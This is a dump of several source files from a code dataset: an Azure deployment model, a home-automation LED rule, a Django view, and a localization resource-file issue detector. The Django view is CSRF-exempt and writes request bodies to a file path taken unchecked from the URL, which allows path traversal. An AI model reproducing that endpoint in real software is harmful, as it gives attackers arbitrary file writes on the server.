'platform_fault_domain_count': {'key': 'properties.parameters.platformFaultDomainCount.value', 'type': 'str'},
'platform_update_domain_count': {'key': 'properties.parameters.platformUpdateDomainCount.value', 'type': 'str'},
'tags': {'key': 'properties.parameters.tags.value', 'type': 'object'},
'mode': {'key': 'properties.mode', 'type': 'str'},
}
uri = "https://azuresdkci.blob.core.windows.net/templatehost/CreateAvailSet_2016-07-18/azuredeploy.json"
mode = "Incremental"
def __init__(self, name, content_version=None, location=None, platform_fault_domain_count="3", platform_update_domain_count="5", tags=None):
self.content_version = content_version
self.location = location
self.name = name
self.platform_fault_domain_count = platform_fault_domain_count
self.platform_update_domain_count = platform_update_domain_count
self.tags = tags
``` |
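A short sketch of how this template-deployment model might be instantiated and serialized into an ARM request body. The `Serializer` usage reflects the msrest package this model is generated for, but the exact package path of `DeploymentAvailSet` is not shown above, so the import is left as a comment; treat the whole block as an illustration rather than the CLI's actual call site.
```python
# Hedged sketch -- assumes msrest is installed and DeploymentAvailSet (defined
# in the file above) is importable; the surrounding package path is not shown.
from msrest import Serializer
# from <package>.models.deployment_avail_set import DeploymentAvailSet  # path not shown above

avail_set = DeploymentAvailSet(
    name="my-avset",
    location="westus",
    platform_fault_domain_count="2",
    platform_update_domain_count="3",
    tags={"env": "dev"})

serializer = Serializer({"DeploymentAvailSet": DeploymentAvailSet})
body = serializer.body(avail_set, "DeploymentAvailSet")
# 'body' is a nested dict keyed by the _attribute_map entries, e.g.
# body["properties"]["parameters"]["platformFaultDomainCount"]["value"] == "2"
```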
{
"source": "0CT3T/Daemon_Home_Integration",
"score": 2
} |
#### File: LED/Regle/Allumer.py
```python
from daemon.Module.Abstract.Rules import Rules
class Allumer(Rules):
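    """Rule that flips the LED "Mode" parameter from "ETEINTE" (off) to "ALLUMER" (on)."""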
def __init__(self, object):
self.object = object
super().__init__()
def test(self):
if self.object.getparamvalue("Mode") == "ETEINTE":
self.object.setparamvalue("Mode", "ALLUMER")
```
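A minimal sketch of the rule in action against a stand-in object that exposes only the two methods `Allumer.test()` calls; the import path is guessed from the file header, and the `Rules` base class is assumed to need no additional setup, so the driver lines are left commented out.
```python
# Hedged sketch -- FakeLed mimics just getparamvalue/setparamvalue; the real
# object comes from the daemon's LED module, which is not shown here.
class FakeLed:
    def __init__(self):
        self._params = {"Mode": "ETEINTE"}
    def getparamvalue(self, name):
        return self._params[name]
    def setparamvalue(self, name, value):
        self._params[name] = value

# from LED.Regle.Allumer import Allumer   # hypothetical import path
# led = FakeLed()
# Allumer(led).test()
# assert led.getparamvalue("Mode") == "ALLUMER"   # the rule turned the LED on
```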
#### File: src/restAPI/views.py
```python
from __future__ import unicode_literals
import sys
from django.http import HttpResponse, Http404
from django.views.decorators.csrf import csrf_exempt
from daemon.initialisation import *
@csrf_exempt
def home(request, fichier):
    """Persist the raw POSTed body into <JSONdirectory>/<fichier>."""
    if request.method == 'POST':
        print(request.body)
        with open(JSONdirectory + fichier, "w") as output_file:
            output_file.write(request.body.decode("utf-8"))
        return HttpResponse(status=201)
    raise Http404("only the POST method is supported")
``` |
{
"source": "0Cubed/ZeroResourceDetector",
"score": 2
} |
#### File: 0Cubed/ZeroResourceDetector/resource_detector.py
```python
import argparse
import sys
import os
import codecs
import logging
import csv
import importlib
import re
import string
import locale
import json
import xml.etree.cElementTree as ET
import pyparsing as PY
from enum import Enum, IntEnum
from datetime import datetime, timezone
__author__ = "Zero<<EMAIL>>"
__version__ = "1.0.0"
__application__ = "resource detector"
BASE_LANGUAGE = "en-us"
STANDARDIZED_LANGUAGES = {
#Tier0-------------------------------------------------------------------------------------------
"en" : "en-us", "en-us" : "en-us", "1033" : "en-us", "english" : "en-us", "en_us" : "en-us",
#Tier1-------------------------------------------------------------------------------------------
"de" : "de-de", "de-de" : "de-de", "1031" : "de-de", "german" : "de-de", "de_de" : "de-de",
"es" : "es-es", "es-es" : "es-es", "3082" : "es-es", "spanish" : "es-es", "es_es" : "es-es", "es-mx" : "es-es",
"fr" : "fr-fr", "fr-fr" : "fr-fr", "1036" : "fr-fr", "french" : "fr-fr", "fr_fr" : "fr-fr",
"ja" : "ja-jp", "ja-jp" : "ja-jp", "1041" : "ja-jp", "japanese" : "ja-jp", "ja_jp" : "ja-jp",
"zh" : "zh-cn", "zh-cn" : "zh-cn", "2052" : "zh-cn", "chinese" : "zh-cn", "zh_cn" : "zh-cn", "zh-rcn" : "zh-cn", "zh-hans" : "zh-cn", "zh-chs" : "zh-cn", "zh_hans" : "zh-cn", "sc" : "zh-cn", "cn" : "zh-cn",
#Tier2-------------------------------------------------------------------------------------------
"ko" : "ko-kr", "ko-kr" : "ko-kr", "1042" : "ko-kr", "korean" : "ko-kr", "ko_kr" : "ko-kr",
"ru" : "ru-ru", "ru-ru" : "ru-ru", "1049" : "ru-ru", "russian" : "ru-ru", "ru_ru" : "ru-ru",
"tc" : "zh-tw", "zh-tw" : "zh-tw", "1028" : "zh-tw", "tw" : "zh-tw", "zh_tw" : "zh-tw", "zh-rtw" : "zh-tw", "zh-hant" : "zh-tw", "zh-cht" : "zh-tw", "zh_hant" : "zh-tw",
#Tier3-------------------------------------------------------------------------------------------
"ar" : "ar-sa", "ar-sa" : "ar-sa", "1025" : "ar-sa", "arabic" : "ar-sa", "ar_sa" : "ar-sa",
"da" : "da-dk", "da-dk" : "da-dk", "1030" : "da-dk", "danish" : "da-dk", "da_dk" : "da-dk",
"he" : "he-il", "he-il" : "he-il", "1037" : "he-il", "hebrew" : "he-il", "he_il" : "he-il",
"it" : "it-it", "it-it" : "it-it", "1040" : "it-it", "italian" : "it-it", "it_it" : "it-it",
"nl" : "nl-nl", "nl-nl" : "nl-nl", "1043" : "nl-nl", "dutch" : "nl-nl", "nl_nl" : "nl-nl",
"no" : "no-no", "no-no" : "no-no", "1044" : "no-no", "norwegian" : "no-no", "no_no" : "no-no", "nb-no" : "no-no", "nb" : "no-no", "nn-no" : "no-no", "nn" : "no-no",#TBD
"pt" : "pt-br", "pt-br" : "pt-br", "1046" : "pt-br", "portuguese" : "pt-br", "pt_br" : "pt-br",
"pt" : "pt-br", "pt-pt" : "pt-pt", "2070" : "pt-pt", "portuguese" : "pt-br", "pt_pt" : "pt-pt", #Add some duplicate items to keep coding format
"pl" : "pl-pl", "pl-pl" : "pl-pl", "1045" : "pl-pl", "polish" : "pl-pl", "pl_pl" : "pl-pl",
"sv" : "sv-se", "sv-se" : "sv-se", "1053" : "sv-se", "swedish" : "sv-se", "sv_se" : "sv-se",
#Others-----------------------------------------------------------------------------------------------
"bg" : "bg-bg", "bg-bg" : "bg-bg",
"lt" : "lt-lt", "lt-lt" : "lt-lt",
"ca" : "ca-es", "ca-es" : "ca-es",
"cs" : "cs-cz", "cs-cz" : "cs-cz",
"cy" : "cy-gb", "cy-gb" : "cy-gb",
"el" : "el-gr", "el-gr" : "el-gr",
"fi" : "fi-fi", "fi-fi" : "fi-fi",
"et" : "et-ee", "et-ee" : "et-ee",
"hi" : "hi-in", "hi-in" : "hi-in",
"hu" : "hu-hu", "hu-hu" : "hu-hu",
"id" : "id-id", "id-id" : "id-id",
"lv" : "lv-lv", "lv-lv" : "lv-lv",
"ro" : "ro-ro", "ro-ro" : "ro-ro",
"ru" : "ru-ru", "ru-ru" : "ru-ru",
"sk" : "sk-sk", "sk-sk" : "sk-sk",
"sl" : "sl-si", "sl-si" : "sl-si",
"th" : "th-th", "th-th" : "th-th",
"tr" : "tr-tr", "tr-tr" : "tr-tr",
"uk" : "uk-ua", "uk-ua" : "uk-ua",
"af" : "af-za", "af-za" : "af-za",
"sq" : "sq-al", "sq-al" : "sq-al",
"am" : "am-et", "am-et" : "am-et",
"hy" : "hy-am", "hy-am" : "hy-am",
"as" : "as-in", "as-in" : "as-in",
"eu" : "eu-es", "eu-es" : "eu-es",
"be" : "be-by", "be-by" : "be-by",
"bn" : "bn-bd", "bn-bd" : "bn-bd", #TBD
"ca" : "ca-es", "ca-es" : "ca-es", #TBD
"gl" : "gl-es", "gl-es" : "gl-es",
"ka" : "ka-ge", "ka-ge" : "ka-ge",
"gu" : "gu-in", "gu-in" : "gu-in",
"is" : "is-is", "is-is" : "is-is",
"ga" : "ga-ie", "ga-ie" : "ga-ie",
"xh" : "xh-za", "xh-za" : "xh-za",
"zu" : "zu-za", "zu-za" : "zu-za",
"kn" : "kn-in", "kn-in" : "kn-in",
"kk" : "kk-kz", "kk-kz" : "kk-kz",
"km" : "km-kh", "km-kh" : "km-kh",
"rw" : "rw-rw", "rw-rw" : "rw-rw",
"sw" : "sw-ke", "sw-ke" : "sw-ke",
"lb" : "lb-lu", "lb-lu" : "lb-lu",
"mk" : "mk-mk", "mk-mk" : "mk-mk",
"ms" : "ms-bn", "ms-bn" : "ms-bn", #TBD
"ml" : "ml-in", "ml-in" : "ml-in",
"mt" : "mt-mt", "mt-mt" : "mt-mt",
"mr" : "mr-in", "mr-in" : "mr-in",
"ne" : "ne-np", "ne-np" : "ne-np",
"or" : "or-in", "or-in" : "or-in",
"fa" : "fa-ir", "fa-ir" : "fa-ir",
"tn" : "tn-bw", "tn-bw" : "tn-bw", #TBD
"si" : "si-lk", "si-lk" : "si-lk",
"ta" : "ta-in", "ta-in" : "ta-in",
"te" : "te-in", "te-in" : "te-in",
"ti" : "ti-et", "ti-et" : "ti-et",
"ur" : "ur-pk", "ur-pk" : "ur-pk",
"vi" : "vi-vn", "vi-vn" : "vi-vn",
"cy" : "cy-gb", "cy-gb" : "cy-gb",
"wo" : "wo-sn", "wo-sn" : "wo-sn",
"hr" : "hr-hr", "hr-hr" : "hr-hr", "hr-ba" : "hr-hr", #TBD
"sr" : "sr-Latn", "sr-Latn" : "sr-Latn", #TBD
"bs" : "bs-cyrl", "bs-cyrl" : "bs-cyrl", #TBD
"pa" : "pa-arab", "pa-arab" : "pa-arab", #TBD
"mi" : "mi-latn", "mi-latn" : "mi-latn", #TBD
"nso" : "nso-za", "nso-za" : "nso-za",
"quz" : "quz-bo", "quz-bo" : "quz-bo", #TBD
"prs" : "prs-af", "prs-af" : "prs-af", #TBD
"kok" : "kok-in", "kok-in" : "kok-in",
"fil" : "fil-latn", "fil-latn" : "fil-latn", #TBD
"gb-latn" : "gb-gb", "gb-gb" : "gb-gb",
"ig-latn" : "ig-ng", "ig-ng" : "ig-ng",
"yo-latn" : "yo-ng", "yo-ng" : "yo-ng",
"ky-cyrl" : "ky-kg", "ky-kg" : "ky-kg",
"tk-cyrl" : "tk-latn", "tk-latn" : "tk-latn", #TBD
"tt-arab" : "tt-cyrl", "tt-cyrl" : "tt-cyrl", #TBD
"tg-arab" : "tg-cyrl", "tg-cyrl" : "tg-cyrl", #TBD
"iu-cans" : "iu-latn", "iu-latn" : "iu-latn", #TBD
"mn-cyrl" : "mn-mong", "mn-mong" : "mn-mong", #TBD
"az-arab" : "az-arab-az", "az-arab-az" : "az-arab-az", #TBD
"sr-cyrl" : "sr-cyrl-cs", "sr-cyrl-cs" : "sr-cyrl-cs", #TBD
"quc-latn" : "qut-gt", "qut-gt" : "qut-gt", #TBD
"chr-cher" : "chr-cher-us", "chr-cher-us" : "chr-cher-us", #TBD
"uz-latn-uz" : "uz-latn", "uz-latn" : "uz-latn",
"sd-arab-pk" : "sd-arab", "sd-arab" : "sd-arab", #TBD
"ha-latn-ng" : "ha-latn", "ha-latn" : "ha-latn",
"ku-arab-iq" : "ku-arab", "ku-arab" : "ku-arab",
}
LANGUAGE_ENCODINGS = {
#Tier0------------------------------------------------------
"en-us" : "cp1252", #Use "cp1252" instead of "ascii" here because sometimes English resource file can be successfully opened with the former but not the later
#Tier1------------------------------------------------------
"de-de" : "cp1252",
"es-es" : "cp1252",
"fr-fr" : "cp1252",
"ja-jp" : "shift_jis", #"cp932"
"zh-cn" : "cp936",
#Tier2------------------------------------------------------
"ko-kr" : "cp949",
"ru-ru" : "cp1251",
"zh-tw" : "big5", #"cp950"
#Tier3------------------------------------------------------
"ar-sa" : "cp1256",
"da-dk" : "cp865",
"he-il" : "cp1255",
"it-it" : "ascii", #TBD
"nl-nl" : "ascii", #TBD
"no-no" : "cp865",
"pt-br" : "cp860",
"pl-pl" : "ascii", #TBD
"sv-se" : "ascii", #TBD
}
TAB_WIDTH = 4
LOG = None
class Severity(Enum):
warning = "warning"
error = "error"
class IssueCode(IntEnum):
duplicate_key = 2000
missing_key = 2001
redundant_key = 2002
untranslated_value = 2003
unused_key = 2004
improperly_used_key = 2005
missing_file = 2006
redundant_file = 2007
unmatched_placeholder = 2008
format_error = 2009
encoding_error = 2010
class IssueName(Enum):
duplicate_key = "duplicate key"
missing_key = "missing key"
redundant_key = "redundant key"
untranslated_value = "untranslated value"
unused_key = "unused key"
improperly_used_key = "undefined key"
missing_file = "missing file"
redundant_file = "redundant file"
unmatched_placeholder = "unmatched placeholder"
format_error = "format error"
encoding_error = "encoding error"
class Description(Enum):
duplicate_key = "duplicate key in resource file(s)"
missing_key = "missing key in localized resource file(s)"
redundant_key = "redundant key in localized resource file(s)"
untranslated_value = "untranslated string value in localized resource file"
unused_key = "unused key in resource file"
improperly_used_key = "undefined resource key used in source code"
missing_file = "missing resource file(s)"
redundant_file = "redundant resource file(s)"
unmatched_placeholder = "unmatched placeholder(s) in localized resource file"
format_error = "string value with format error in resource file"
encoding_error = "unknown or incorrect encoding of resource file"
class Context(Enum):
    duplicate_key = "key=\u2308{0}\u2309, language(s)=\u2308{1}\u2309"
    missing_key = "key=\u2308{0}\u2309, language(s)=\u2308{1}\u2309"
    redundant_key = "key=\u2308{0}\u2309, language(s)=\u2308{1}\u2309"
untranslated_value = "key=\u2308{0}\u2309, value=\u2308{1}\u2309"
    unused_key = "key=\u2308{0}\u2309"
improperly_used_key = "{0}"
missing_file = "language(s)=\u2308{0}\u2309"
redundant_file = "language(s)=\u2308{0}\u2309"
unmatched_placeholder = "key=\u2308{0}\u2309, base value=\u2308{1}\u2309, localized value=\u2308{2}\u2309"
format_error = "key=\u2308{0}\u2309, value=\u2308{1}\u2309"
encoding_error = "{0}"
class Issue:
def __init__(self, file, line, column_begin, column_begin_offset, column_end, severity, code, description, context, information = None):
self.file= file
self.line = line
self.column_begin = column_begin
self.column_begin_offset = column_begin_offset
self.column_end = column_end
self.code = code
self.description = description
self.severity = severity
self.context = context
self.information = information
def write(self):
issue = "file: {file}, ".format(file = self.file)
if self.line or self.column_begin or self.column_end:
issue += "line: {line}, column begin: {column_begin}, column end: {column_end}, ".format(line = self.line, column_begin = self.column_begin + self.column_begin_offset, column_end = self.column_end)
issue += "issue: {description}, severity: {severity}, context: {context}".format(description = self.description.value, severity = self.severity.value, context = self.context.replace("\u2308", "").replace("\u2309", ""))
if self.information:
issue += ", information: {information}".format(information = self.information)
LOG.info(issue)
def write_with_position(self):
LOG.info("file: {file}, line: {line}, column begin: {column_begin}, column end: {column_end}, issue: {description}, severity: {severity}, context: {context}".format(file = self.file, line = self.line, column_begin = self.column_begin + self.column_begin_offset, column_end = self.column_end, description = self.description.value, severity = self.severity.value, context = self.context.replace("\u2308", "").replace("\u2309", "")))
def write_without_position(self):
LOG.info("file: {file}, issue: {description}, severity: {severity}, context: {context}".format(file = self.file, description = self.description.value, severity = self.severity.value, context = self.context.replace("\u2308", "").replace("\u2309", "")))
class Issues:
def __init__(self):
self.issues = []
self.warnings = []
self.errors = []
self.issue_count = 0
self.warning_count = 0
self.error_count = 0
def add(self, issue):
self.issues.append(issue)
self.issue_count += 1
if issue.severity == Severity.warning:
self.warnings.append(issue)
self.warning_count += 1
elif issue.severity == Severity.error:
self.errors.append(issue)
self.error_count += 1
else:
pass
def extend(self, issues_add):
if not issues_add:
return
self.issues.extend(issues_add.issues)
self.warnings.extend(issues_add.warnings)
self.errors.extend(issues_add.errors)
self.issue_count += issues_add.issue_count
self.warning_count += issues_add.warning_count
self.error_count += issues_add.error_count
def get_issues(self):
for issue in self.issues:
yield issue
def get_warnings(self):
for warning in self.warnings:
yield warning
def get_errors(self):
for error in self.errors:
yield error
class BaseResFile:
def __init__(self, directory, file, extension, language = None):
self.directory = directory
self.file = file
self.extension = extension
self.path = os.path.join(self.directory, self.file)
if language:
self.language = language
else:
self.language = self.get_language()
self.keys = set()
self.values = []
self.key_value_pairs = {}
#self.key_line_pairs = {}
self.duplicate_keys = []
self.escape_error_keys = []
self.item_count = 0
self.encoding_error = ""
def reset_value_containers(self):
self.keys = set()
self.values = []
self.key_value_pairs = {}
#self.key_line_pairs = {}
self.duplicate_keys = []
self.escape_error_keys = []
self.item_count = 0
def get_language(self):
sub_names = self.file.lower().split(".")
try:
sub_name = sub_names[-2]
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
except IndexError:
pass
for sub_name in sub_names:
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
sub_dirs = self.directory.lower().split(os.sep)
try:
sub_dir = sub_dirs[-1]
if sub_dir in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_dir]
except IndexError:
pass
#Is the following necessary? Do we need to decide whether the other sub directory is language id besides the last sub directory?
for sub_dir in sub_dirs:
if sub_dir in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_dir]
return BASE_LANGUAGE
def is_file(self):
return os.path.isfile(self.path)
def read(self):
try:
f = open(self.path, "rb")
bin_data = f.read()
f.close()
except Exception as e:
LOG.error("Cannot open file '{path}' to read: {exception}".format(path = self.path, exception = e))
return None
for bom, encoding in {codecs.BOM_UTF8 : "utf_8", codecs.BOM_UTF16_BE : "utf_16_be", codecs.BOM_UTF16_LE : "utf_16_le", codecs.BOM_UTF32_BE : "utf_32_be", codecs.BOM_UTF32_LE : "utf_32_le"}.items():
if bin_data.startswith(bom):
try:
return bin_data[len(bom):].decode(encoding)
except UnicodeDecodeError:
#LOG.error("Cannot read file '{path}', the real encoding is not the same as {encoding} encoding detected by BOM".format(path = self.path, encoding = encoding))
self.encoding_error = "the real encoding is not the same as '{encoding}' encoding detected by BOM".format(encoding = encoding)
return None
try:
return bin_data.decode("utf_8")
except UnicodeDecodeError:
pass
if self.language in LANGUAGE_ENCODINGS.keys():
try:
return bin_data.decode(LANGUAGE_ENCODINGS[self.language])
except UnicodeDecodeError:
pass
try:
return bin_data.decode("cp1252")#some localized resource files are not translated
except UnicodeDecodeError:
#LOG.error("Cannot read file '{0}', encoding is unknown".format(self.path))
self.encoding_error = "unknown encoding"
return None
else:
#LOG.error("Cannot read file '{0}', encoding is unknown".format(self.path))
self.encoding_error = "unknown encoding"
return None
def get_group_id(self):
sub_names = self.file.split(".")
file_adjusted = ""
for sub_name in sub_names:
if not sub_name.lower() in STANDARDIZED_LANGUAGES.keys():
file_adjusted += sub_name
#dir_adjusted = self.directory
#base_name = os.path.basename(self.directory).lower()
#if base_name in STANDARDIZED_LANGUAGES.keys():
# dir_adjusted = os.path.dirname(self.directory)
#return file_adjusted, dir_adjusted
#remove language in whatever position instead of the last position: add language position as the third id(the position set to 1 if there is no language)
sub_dirs = self.directory.split(os.sep)
dir_adjusted = sub_dirs
index = 0
for sub_dir in sub_dirs:
if sub_dir.lower() in STANDARDIZED_LANGUAGES.keys():
dir_adjusted.remove(sub_dir)
break
index += 1
return file_adjusted, os.sep.join(dir_adjusted), index
def parse(self, parsing_patterns = None):
pass
class ResFileGroup:
def __init__(self, base_res_file = None):
self.res_files = {}
self.localized_res_files = {}
self.base_res_file = base_res_file
#TODO: check whether the language of base_res_file is BASE_LANGUAGE
if base_res_file:
self.res_files[base_res_file.language] = base_res_file
def add_resource_file(self, res_file):
#TODO: check the language of current file exists in group
self.res_files[res_file.language] = res_file
if res_file.language != BASE_LANGUAGE:
self.localized_res_files[res_file.language] = res_file
else:
if self.base_res_file:
LOG.warning("Two English resource files found in a group. If the languages of them are wrongly-determined, contact the tool author, otherwise remove unused resource file in source code or check the configuration file to make sure correct resource file is used. Two suspect resource files are:\n '{base_file}'\n '{current_file}'".format(base_file = self.base_res_file.path, current_file = res_file.path))
self.base_res_file = res_file
class BaseResDetector:
def __init__(self, dir_input, res_files_input, config_input, type_input):
self.src_dir = dir_input
self.config = config_input
self.detect_languages = set()
self.detect_issues = set()
self.res_files = res_files_input
self.res_file_type = type_input
self.res_file_ext = self.res_files[0].extension
self.res_file_groups = []
self.issues = Issues()
self.res_file_count = 0
self.item_count = 0
def detect(self):
self.group_resource_files()
self.parse_resource_files()
self.filter_resource_file_groups()
self.get_detect_languages()
self.get_detect_issues()
self.detect_duplicate_keys()
self.detect_missing_keys()
self.detect_redundant_keys()
self.detect_untranslated_values()
self.detect_unused_and_undefined_keys()
self.detect_missing_resource_files()
self.detect_redundant_resource_files()
self.detect_unmatched_placeholders()
self.detect_values_with_format_error()
self.detect_encoding_errors()
def print_group(self):
for res_file_group in self.res_file_groups:
for language, res_file in sorted(res_file_group.res_files.items()):
res_file_info = res_file.path + " " + language
if res_file == res_file_group.base_res_file:
res_file_info += "------base------"
LOG.info(res_file_info)
LOG.info("************************************************************************************************************************")
def write_configuration(self):
self.group_resource_files()
self.parse_resource_files()
self.filter_resource_file_groups()
self.get_detect_languages()
self.get_detect_issues()
config_file = open(file = self.config.config_file_path, mode = "a", encoding = "utf_8_sig")
LOG.info("Writing configuration...")
config_file.write(self.config.detector_switch_attrs[self.res_file_type] + " = True\n")
config_file.write("{attr_name} = [{detect_issues}]\n".format(attr_name = self.config.detect_issues_attrs[self.res_file_type], detect_issues = ", ".join(['"{item}"'.format(item = item.value) for item in IssueName if item.value in self.detect_issues])))
config_file.write(self.config.detect_languages_attrs[self.res_file_type] + " = [")
for language in sorted(self.detect_languages):
config_file.write("\"" + language + "\", ")
config_file.write("]\n")
config_file.write(self.config.fixed_res_groups_attrs[self.res_file_type] + " = True\n")
config_file.write(self.config.res_groups_attrs[self.res_file_type] + " =\\\n[\n")
for res_file_group in self.res_file_groups:
config_file.write("{\n")
for language, res_file in sorted(res_file_group.res_files.items()):
config_file.write("\"" + language + "\" : R\"" + res_file.path + "\",\n")
config_file.write("},\n")
config_file.write("]\n\n\n")
config_file.close()
def group_resource_files(self):
use_fixed_res_file_group = True
if self.config.use_user_config:
try:
use_fixed_res_file_group = getattr(self.config.config_module, self.config.fixed_res_groups_attrs[self.res_file_type])
except AttributeError:
pass
if self.config.use_user_config and use_fixed_res_file_group:
LOG.info("Reading resource file group information from configuration file...")
try:
res_file_groups_config = getattr(self.config.config_module, self.config.res_groups_attrs[self.res_file_type])
except AttributeError:
LOG.critical("'{group_name}' is not defined in configuration file".format(group_name = self.config.res_groups_attrs[self.res_file_type]))
quit_application(-1)
for res_file_group_config in res_file_groups_config:
res_file_group = ResFileGroup()
for language_key, path in res_file_group_config.items():
absolute_path = os.path.join(self.src_dir, path)
directory = os.path.dirname(absolute_path)
file = os.path.basename(absolute_path)
if not file.endswith("." + self.res_file_ext):
LOG.critical("'{file}' is not a '{type}' resource file".format(file = absolute_path, type = self.res_file_ext))
quit_application(-1)
if not os.path.isfile(absolute_path):
LOG.critical("'{path}' does not exist".format(path = absolute_path))
quit_application(-1)
language = None
try:
language = STANDARDIZED_LANGUAGES[language_key]
except KeyError:
LOG.critical("'{language_key}' is not a valid language, please refer to the following: {standardized_languages}".format(language_key = language_key, standardized_languages = "'" + "', '".join(STANDARDIZED_LANGUAGES.keys()) + "'."))
quit_application(-1)
res_file = self.config.res_file_classes[self.res_file_type](directory , file, self.res_file_ext, language)
res_file_group.add_resource_file(res_file)
self.res_file_groups.append(res_file_group)
else:
LOG.info("Grouping resource files...")
id_group_pairs = {}
for res_file in self.res_files:
group_id = res_file.get_group_id()
res_file_group = id_group_pairs.get(group_id)
if res_file_group:
res_file_group.add_resource_file(res_file)
else:
res_file_group = ResFileGroup()
res_file_group.add_resource_file(res_file)
id_group_pairs[group_id] = res_file_group
self.res_file_groups.append(res_file_group)
def get_detect_issues(self):
if self.config.use_user_config:
LOG.info("Reading issue types to be detected from configuration file...")
self.detect_issues = getattr(self.config.config_module, self.config.detect_issues_attrs[self.res_file_type], self.config.default_detect_issues)
else:
LOG.info("Getting default issue types to be detected...")
self.detect_issues = self.config.default_detect_issues
def get_detect_languages(self):
if self.config.use_user_config:
LOG.info("Reading languages to be detected from configuration file...")
try:
self.detect_languages = set(getattr(self.config.config_module, self.config.detect_languages_attrs[self.res_file_type]))
except AttributeError:
LOG.critical("Cannot read languages from configuration files")
quit_application(-1)
else:
LOG.info("Determining languages to be detected...")
language_counts = {}
max_count = 0
for res_file_group in self.res_file_groups:
num = len(res_file_group.res_files.keys())
if num != 1:
if not num in language_counts.keys():
language_counts[num] = 0
language_counts[num] += 1
current_count = language_counts[num]
if current_count > max_count:
max_count = current_count
self.detect_languages = set(res_file_group.res_files.keys())
elif current_count == max_count:
current_languages = set(res_file_group.res_files.keys())
if len(current_languages) > len(self.detect_languages):
self.detect_languages = current_languages
else:
pass
if max_count == 0:
try:
self.detect_languages = set(self.res_file_groups[0].res_files.keys())
except IndexError:
pass
LOG.info("Detect language(s): {languages}".format(languages = " ".join(sorted(self.detect_languages))))
def get_parsing_patterns(self):
return None
def parse_resource_files(self):
LOG.info("Parsing resource files, which may take some time...")
parsing_patterns = self.get_parsing_patterns()
for res_file_group in self.res_file_groups:
for language, res_file in res_file_group.res_files.items():
res_file.parse(parsing_patterns)
self.item_count += res_file.item_count
def filter_resource_file_groups(self):
LOG.info("Removing group where each file has no string...")
temp_groups = list(self.res_file_groups)
self.res_file_groups = []
for res_file_group in temp_groups:
qualified_flag = False
for language, res_file in res_file_group.res_files.items():
if (res_file.item_count != 0) or res_file.encoding_error:
qualified_flag = True
if qualified_flag:
self.res_file_groups.append(res_file_group)
self.res_file_count += len(res_file_group.res_files)
def detect_missing_resource_files(self):
if IssueName.missing_file.value not in self.detect_issues:
return
LOG.info("Detecting missing localized resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
missing_languages = self.detect_languages - set(res_file_group.res_files.keys())
formatted_languages = "/".join(sorted(missing_languages))
if formatted_languages:
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.missing_file, description = Description.missing_file, severity = Severity.warning, context = Context.missing_file.value.format(formatted_languages))
self.issues.add(issue)
def detect_redundant_resource_files(self):
if IssueName.redundant_file.value not in self.detect_issues:
return
LOG.info("Detecting redundant localized resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
redundant_languages = set(res_file_group.res_files.keys()) - self.detect_languages
formatted_languages = "/".join(sorted(redundant_languages))
if formatted_languages:
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.redundant_file, description = Description.redundant_file, severity = Severity.warning, context = Context.redundant_file.value.format(formatted_languages))
self.issues.add(issue)
def detect_duplicate_keys(self):
if IssueName.duplicate_key.value not in self.detect_issues:
return
LOG.info("Detecting duplicate keys in resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
key_languages = {}
for language, res_file in sorted(res_file_group.res_files.items()):
for duplicate_key in res_file.duplicate_keys:
duplicate_languages = key_languages.get(duplicate_key, None)
if duplicate_languages:
key_languages[duplicate_key] = duplicate_languages + "/" + language
else:
key_languages[duplicate_key] = language
for duplicate_key, duplicate_languages in sorted(key_languages.items()):
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.duplicate_key, description = Description.duplicate_key, severity = Severity.error, context = Context.duplicate_key.value.format(duplicate_key, duplicate_languages))
self.issues.add(issue)
def detect_missing_keys(self):
if IssueName.missing_key.value not in self.detect_issues:
return
LOG.info("Detecting missing keys in localized resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
base_keys = base_res_file.keys
key_languages = {}
for language, res_file in sorted(res_file_group.localized_res_files.items()):
missing_keys = base_keys - res_file.keys
for missing_key in missing_keys:
missing_languages = key_languages.get(missing_key, None)
if missing_languages:
key_languages[missing_key] = missing_languages + "/" + language
else:
key_languages[missing_key] = language
for missing_key, missing_languages in sorted(key_languages.items()):
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.missing_key, description = Description.missing_key, severity = Severity.error, context = Context.missing_key.value.format(missing_key, missing_languages))
self.issues.add(issue)
def detect_redundant_keys(self):
if IssueName.redundant_key.value not in self.detect_issues:
return
LOG.info("Detecting redundant keys in localized resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
base_keys = base_res_file.keys
key_languages = {}
for language, res_file in sorted(res_file_group.localized_res_files.items()):
redundant_keys = res_file.keys - base_keys
for redundant_key in redundant_keys:
redundant_languages = key_languages.get(redundant_key, None)
if redundant_languages:
key_languages[redundant_key] = redundant_languages + "/" + language
else:
key_languages[redundant_key] = language
for redundant_key, redundant_languages in sorted(key_languages.items()):
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.redundant_key, description = Description.redundant_key, severity = Severity.error, context = Context.redundant_key.value.format(redundant_key, redundant_languages))
self.issues.add(issue)
def is_translation_necessary(self, value):
if not value:
return False
if value.isnumeric():
return False
# URLs are not skipped here because we cannot be sure that they never need translation:
#if value.startswith("http://") or value.startswith("https://"):
#return False
return True
def detect_untranslated_values(self):
if IssueName.untranslated_value.value not in self.detect_issues:
return
LOG.info("Detecting untranslated values in resource files...")
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
base_keys = base_res_file.keys
